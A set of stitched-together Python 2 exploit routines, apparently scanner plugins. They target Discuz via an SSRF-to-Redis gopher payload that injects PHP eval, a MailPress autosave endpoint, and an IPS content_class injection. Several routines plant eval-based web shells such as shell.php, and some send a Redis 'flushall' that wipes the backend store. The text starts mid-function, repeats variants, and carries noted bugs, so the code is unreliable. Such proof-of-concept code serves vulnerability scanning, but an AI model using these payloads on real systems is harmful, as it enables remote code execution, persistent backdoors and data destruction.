    payload = ('gopher://127.0.0.1:6379/'\
               '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
               'for i,v in ipairs(t) do redis.call(\'set\',v,'\
               '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
               'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
               's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
               'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
               's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
               ' end;return 1;" 0 %250D%250Aquit')
    web_url = self.url.rpartition('/')
    # Re-joins the split URL and appends a trailing slash (instance state changes here).
    self.url = web_url[0]+ '/' + web_url[2] + '/'
    vul_url = self.url + ssrf_url + payload
    base_rep = req.get(vul_url)
    # After the rewrite web_url[2] is '' and web_url[0] is self.url without the slash.
    web_url = self.url.rpartition('/')
    while base_rep.status_code == 200:
        shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
        rep = req.get(shell_url)
        if rep.status_code == 200:
            shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[she1l]);?>");'
            shell_payload_b64 = base64.b64encode(shell_payload)
            attack_url= shell_url + '&a=' + shell_payload_b64
            req.get(attack_url)
            flag = "phpinfo";
            shell_url = web_url[0] + '/' + 'shell.php'
            verify_url = shell_url + "?she1l=phpinfo();"
            rep = req.get(verify_url)
            if rep.status_code == 200 and flag in rep.content:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = shell_url
                result['ShellInfo']['Content'] = '@eval($_REQUEST[she1l]);'
                # Clear the backend memory store.
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + ssrf_url +payload_flush
                req.get(recover_url)
                req.get(web_url[0] + '/forum.php')
                break
        web_url = web_url[0].rpartition('/')
        return self.parse_output(result)
    return self.parse_output(result)
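def resolve_js_redirects(url):
    """Follow HTTP redirects plus one client-side (meta/body/JS) redirect and return the landing URL.

    ``url`` is fetched with ``req.get`` (which follows 3xx redirects).  The
    response body is then searched, in order, for a ``<meta ... url=...>``
    refresh, a ``<body ... location=...>`` assignment, and a
    ``window.location.replace/href/assign`` call inside a ``<script>`` block;
    the first match wins.

    Args:
        url: target URL.  ``http://`` is prepended when no scheme is given.
            Whatever is passed in is fetched, so callers must not hand this
            function untrusted input.

    Returns:
        The final URL as a string.  A client-side redirect target is resolved
        against the fetched page's URL, so a relative target such as
        ``login.php`` (or an empty capture) comes back as an absolute URL
        instead of a bare fragment.

    Raises:
        Whatever ``req.get`` raises on network errors; nothing is swallowed.
    """
    meta_regx = '(?is)\<meta[^<>]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*'
    body_regx = '''(?is)\<body[^<>]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*'''
    js_regx = '''(?is)<script.*?>[^<>]*?window\.location\.(?:replace|href|assign)[\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?</script>'''
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    res = req.get(url)
    # res.url already reflects any server-side (3xx) redirects.
    true_url = res.url
    for regx in (meta_regx, body_regx, js_regx):
        match = re.search(regx, res.text)
        if match:
            # The captured target may be relative; anchor it to the page that
            # issued it so callers always receive a usable absolute URL.
            true_url = urlparse.urljoin(res.url, match.group(1))
            break
    return true_url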
def _verify(self):
    """Check an IPS ``content_class`` injection by asking the target to echo ``md5(flag)`` and looking for that hash.

    Builds a random 10-character ``flag``, sends ``payload`` and records
    ``target_url`` in ``result`` when the response contains
    ``hashlib.md5(flag).hexdigest()``.

    Returns:
        ``self.parse_output(result)``; ``result`` is empty when the first
        response was not 200 or the hash was absent.

    NOTE(review): ``url_part`` is computed but never used, and the ``while``
    ends in an unconditional ``break`` so it runs at most once.
    """
    result = {}
    url_part = self.url.rpartition('/')
    random_sed = string.letters+string.digits
    flag = ''.join([random.choice(random_sed) for _ in xrange(10)])
    payload = "/index.php?app=core&module=system&controller=content&do=find&content_class=cms\\Fields1{}echo%20" + "md5(" + flag + ");/*"
    target_url = self.url + payload
    # No timeout on the request.
    target_rep = req.get(target_url)
    while target_rep.status_code == 200:
        flag_hash = hashlib.md5(flag).hexdigest()
        if flag_hash in target_rep.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
        break
    return self.parse_output(result)
def _verify(self):
    """Verify routine using a local ``ssrf_gopher.php`` relay: looks for ``phpinfo`` in the ``forum.php`` response.

    Normalises ``self.url`` to scheme + host plus the first path segment,
    sends ``payload`` through ``ssrf_url``, requests ``forum.php`` and, when
    ``phpinfo`` appears in the response, records ``verify_url`` in ``result``,
    issues the flush request and re-requests ``forum.php``.

    Returns:
        ``self.parse_output(result)``; ``result`` is empty when the first
        request was not 200 or the marker was absent.

    NOTE(review): ``self.url`` is rewritten on the instance, and
    ``print self.url`` is leftover debug output to stdout.
    """
    ###
    # !!!! The ssrf_url is a file I put into discuz for testing.
    # !!!! If one day you find the real ssrf in discuz, change ssrf_url to make it work.
    ###
    print self.url
    ssrf_url = "ssrf_gopher.php?ssrf="
    result = {}
    payload = ('gopher://127.0.0.1:6379/'\
               '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
               'for i,v in ipairs(t) do redis.call(\'set\',v,'\
               '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
               'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
               's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
               'a:1:{s:7:\\\"plugins\\\";s:10:\\\"phpinfo();\\\";}}}'\
               's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
               ' end;return 1;" 0 %250D%250Aquit')
    tmpparse = urlparse.urlparse(self.url)
    # Keep only the first path segment (split('/')[1] is the text after the leading slash).
    if tmpparse.path != '':
        self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
    else:
        self.url = tmpparse.scheme + '://'+ tmpparse.netloc
    vul_url = self.url + '/' + ssrf_url + payload
    base_rep = req.get(vul_url)
    # Runs at most once: the body ends in an unconditional break.
    while base_rep.status_code == 200:
        verify_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
        rep = req.get(verify_url)
        flag = 'phpinfo';
        if flag in rep.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
            # Restore the backend store after verification.
            payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
            recover_url = self.url + '/' +ssrf_url + payload_flush
            req.get(recover_url)
            req.get(self.url + '/forum.php')
        break
    return self.parse_output(result)
def _attack(self):
    """Attack routine for the MailPress ``autosave`` endpoint: posts a PHP subject, then fetches it back via ``iview``.

    POSTs ``post_data`` to ``exp_url``, extracts the ``<autosave id='N'>``
    value from the response, requests ``action=iview&id=N`` and records the
    URL in ``result`` when ``md5(flag)`` appears in that response.

    Returns:
        ``self.parse_output(result)``; ``result`` is empty when the id is 0 or
        the hash was absent.

    Raises:
        IndexError when the autosave id pattern is not found (``getid[0]``),
        ValueError when the id is empty (``int('')``) — neither is handled.

    NOTE(review): the recorded ``Content`` names ``$_REQUEST[c1tas]`` but the
    subject that was posted uses ``$_REQUEST[shell]``; one of the two is
    stale.  ``self.url`` is rewritten on the instance.
    """
    result = {}
    flag = ''.join([random.choice(string.digits) for _ in range(8)])
    flag_hash = hashlib.md5(flag).hexdigest()
    exp_url = "wp-content/plugins/mailpress/mp-includes/action.php"
    post_data = {
        'action':'autosave',
        'id':'0',
        'revision':'-1',
        'to_list':'1',
        'subject':'<?php echo md5('+flag+'); @eval($_REQUEST[shell]);?>',
        'mail_format':'standard',
        'autosave':'1'
    }
    tmpparse = urlparse.urlparse(self.url)
    # Keep only the first path segment.
    if tmpparse.path != '':
        self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
    else:
        self.url = tmpparse.scheme + '://'+ tmpparse.netloc
    vul_url = self.url + '/' + exp_url
    base_rep = req.post(vul_url,data=post_data)
    # [\d]* also matches an empty id; see the Raises note above.
    getid = re.findall(r'<autosave id=\'[\d]*\'',base_rep.content,re.I)
    tmpid = getid[0].split("'")[1]
    # Runs at most once: the body ends in an unconditional break.
    while int(tmpid) > 0:
        shell_url = self.url + '/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id='+tmpid
        rep = req.get(shell_url)
        if flag_hash in rep.content:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = shell_url
            result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'
        break
    return self.parse_output(result)
def _verify(self): result = {} #Write your code here flag = ''.join([random.choice(string.digits) for _ in range(8)]) payload = ('gopher://127.0.0.1:6379/' '_eval "local t=redis.call(\'keys\',\'*_setting\');' 'for i,v in ipairs(t) do redis.call(\'set\',v,' '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";' 'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";' 's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";' 'a:1:{s:7:\\\"plugins\\\";s:14:\\\"md5(' + flag + ');\\\";}}}' 's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')' ' end;return 1;" 0 %250D%250Aquit') vul_url = self.url + payload req.get(vul_url) web_url = self.url.rpartition('/') while web_url[2] != urlparse.urlparse(self.url).netloc: poc_url = web_url[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' rep = req.get(poc_url) flag_hash = hashlib.md5(flag).hexdigest() if flag_hash in rep.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = poc_url # 验证后恢复,避免网站无法访问 payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit' recover_url = self.url + payload_flush req.get(recover_url) req.get(web_url[0] + '/forum.php') break web_url = web_url[0].rpartition('/') return self.parse_output(result)
def _verify(self):
    '''
    Set up ssrf.php locally and verify the PoC through it.

    Rewrites self.url to end with a trailing slash, sends ``payload``
    through ``ssrf_url``, then requests ``forum.php``; when ``phpinfo``
    appears in the response the URL is recorded, the flush request is
    issued and ``forum.php`` is re-requested.

    Returns ``self.parse_output(result)``; ``result`` is empty when the
    first request was not 200.

    NOTE(review): as laid out here, nothing inside the loop changes
    ``base_rep`` or ``verify_url`` — ``web_url`` is advanced each pass but
    never used to build ``verify_url`` — so when the marker is absent the
    loop does not terminate.  Presumably this was meant to walk parent
    directories like the netloc-bounded variant of this routine; confirm
    against the original layout.  ``self.url`` is also mutated on the
    instance and the rewritten value ends in ``/``, giving a double slash
    in ``verify_url``.
    '''
    ssrf_url = "ssrf.php?ssrf="
    result = {}
    payload = ('gopher://127.0.0.1:6379/'\
               '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
               'for i,v in ipairs(t) do redis.call(\'set\',v,'\
               '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
               'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
               's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
               'a:1:{s:7:\\\"plugins\\\";s:10:\\\"phpinfo();\\\";}}}'\
               's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
               ' end;return 1;" 0 %250D%250Aquit')
    web_url = self.url.rpartition('/')
    # Re-joins the split URL and appends a trailing slash.
    self.url = web_url[0]+ '/' + web_url[2] + '/'
    vul_url = self.url + ssrf_url + payload
    base_rep = req.get(vul_url)
    while base_rep.status_code == 200:
        verify_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
        rep = req.get(verify_url)
        flag = 'phpinfo';
        if flag in rep.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
            # Restore the backend store after verification.
            payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
            recover_url = self.url + ssrf_url + payload_flush
            req.get(recover_url)
            req.get(web_url[0] + '/forum.php')
            break
        web_url = web_url[0].rpartition('/')
    return self.parse_output(result)
def _verify(self):
    """Verify routine (``xeval`` variant) using a random 16-character ``flag`` and its MD5 as the marker.

    Sends ``payload`` through ``self.url``; when that returns 200 it requests
    ``forum.php`` under the parent path and, when ``md5(flag)`` appears in the
    response, records ``poc_url``, issues the flush request and re-requests
    ``forum.php``.

    Returns:
        ``self.parse_output(result)``; ``result`` is empty when the first
        request was not 200 or the hash was absent.

    NOTE(review): no request carries a timeout, and the ``while`` ends in an
    unconditional ``break`` so it runs at most once.
    """
    result = {}
    # url_part[0] is self.url with its last path segment removed.
    url_part = self.url.rpartition('/')
    #ssrf_url = "ssrf_gopher.php?ssrf="
    random_sed = string.letters+string.digits
    flag = ''.join([random.choice(random_sed) for _ in xrange(16)])
    # s:22 matches the length of "md5(" + 16 characters + ");".
    payload = ('gopher://127.0.0.1:6379/xeval '
               '"local t=redis.call(\'keys\',\'*_setting\');'
               'for i,v in ipairs(t) do redis.call(\'set\',v,'
               '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
               'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
               's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
               's:22:\\"md5('+ flag +');\\";}}}'
               's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
               'return 1;" 0 %250D%250Aquit')
    target_url = self.url + payload
    target_rep = req.get(target_url)
    while target_rep.status_code == 200 :
        poc_url = url_part[0] +'/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
        poc_rep = req.get(poc_url)
        flag_hash = hashlib.md5(flag).hexdigest()
        if flag_hash in poc_rep.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = poc_url
            # recover the website
            flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
            flush_url = self.url + flush_payload
            req.get(flush_url)
            test_url = url_part[0] + '/forum.php'
            req.get(test_url)
        break
    return self.parse_output(result)